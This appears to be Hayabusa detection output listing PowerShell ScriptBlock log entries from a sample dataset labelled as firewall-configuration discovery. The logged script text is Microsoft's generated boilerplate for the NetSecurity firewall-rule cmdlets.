[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${LocalUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'I",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 
07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,n'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_def,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"aultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 